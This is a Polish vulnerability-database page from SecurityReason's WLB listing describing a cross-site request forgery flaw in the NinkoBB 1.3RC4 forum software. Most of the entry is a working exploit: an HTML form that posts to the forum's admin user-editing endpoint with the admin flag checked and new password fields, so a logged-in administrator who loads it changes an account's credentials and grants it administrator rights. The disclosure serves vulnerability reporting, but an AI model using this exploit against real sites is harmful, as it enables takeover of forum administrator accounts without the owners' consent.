Bezpieczeństwo informacji

, Wiadomości IT, Audyt bezpieczeństwa
Rejestracja | Zapomniałem hasła | Zaloguj się
Polski Polski  Angielski Angielski
Szukaj :
SecurityReason
Wiadomości IT
Dodaj wiadomość
Szukaj
Baza SecurityAlert
O SecurityAlert
Baza ExploitAlert
Badania SecurityReason
WLB
Baza WLB
Dodaj Note WLB
O WLB
Audyt
Informacje
Harmonogram
Cena
Referencje
Kontakt
RSS
Wiadomości
SecurityAlert
ExploitAlert
Apache
PHP
WLB
Zespół
Kontakt
Informacje o firmie
Informacja

Jeśli znalazłeś interesujący błąd i chcesz go nam wysłać, użyj adresu:
secalert(.)securityreason(.)pl

Twój exploit może być opublikowany w dziale ExploitAlert. Wyślij go nam na adres:
exploit(.)securityreason(.)pl
Strona główna arrow Baza WLB          

  Tytuł : NinkoBB 1.3RC4 change / add administrator CSRF
  WLB : WLB-2010030087  (Szczegóły)
  Data publikacji : 2010-03-20
  Autor          : ItSecTeam
  Poziom ryzyka : Niski  Poziom Niski  (Szczegóły)
  Zdalny błąd : Tak
  Lokalny błąd : Nie
  Status   : Bład

  Historia :
[2010-03-20] Publikacja

  Podatne oprogramowanie :  

NinkoBB version 1.3RC4


  Tekst :  

#########################change admin (user,passwd) & add new admin user
exploit################
Author: ItSecTeam

download from:http://ninkobb.com/releases/?NinkoBB-1.3RC4.zip

script:NinkoBB 1.3RC4

update:2010
-----------------------------------------
xpl:

<html>
<head>
<body>
<h2>coded by ahmadbady</h2>
<td colspan="6" class="title">Admin Control Panel - Editing User</td>
</tr>
<form name="form" method="post" action="admin.php?a=users&edit=1">
<td class="form">
<dl class="input">
<dt>Username</dt>
<dd><input type="text" name="username" class="border" style="width: 40%"
value="anything"></dd>
<dl class="input">
<dt>Settings<br /><br />
<span></span>
<dd><input type="checkbox" name="banned" /> banned</dd>
<dd><input type="checkbox" name="moderator" /> moderator</dd>
<dd><input type="checkbox" name="admin" checked /> admin</dd>
<dl class="input">
<dt>Email</dt>
<dd><input type="text" name="email" class="border" style="width: 40%"
value=""></dd>
<dl class="input">
<dt>New Password</dt>
<dd><input type="password" name="npassword" class="border" style="width:
40%"></dd>
<dl class="input">
<dt>New Password Again</dt>
<dd><input type="password" name="npassworda" class="border" style="width:
40%"></dd>
<dl class="input">
<dt>&nbsp;</dt>
<dd><input type="submit" class="button" name="edit" value="submit"></dd>
</body>
</html>

########################

discovered by ahmadbady

########################



  Referencje :  

None


Jeżeli chcesz zmienić powyższą note, prosze użyj UCP
Apache rss
» 
Apache HTTP Server Denial
   of Service Vulnerability
» 
Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)
» 
Apache Continuum
   cross-site scripting
   vulnerability
» 
Apache Tomcat DoS
   Vulnerability
PHP rss
» 
PHP Hashtables Denial of
   Service
» 
PHP 5.3.6 multiple null
   pointer dereference
» 
PHP 5.3.6 ZipArchive
   invalid use glob(3)
» 
libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)
Patronat

Szkolenia ISecMan

ISecMan

Szkolenia Multitrain

Multitrain
Copyright © SecurityReason. All Rights Reserved.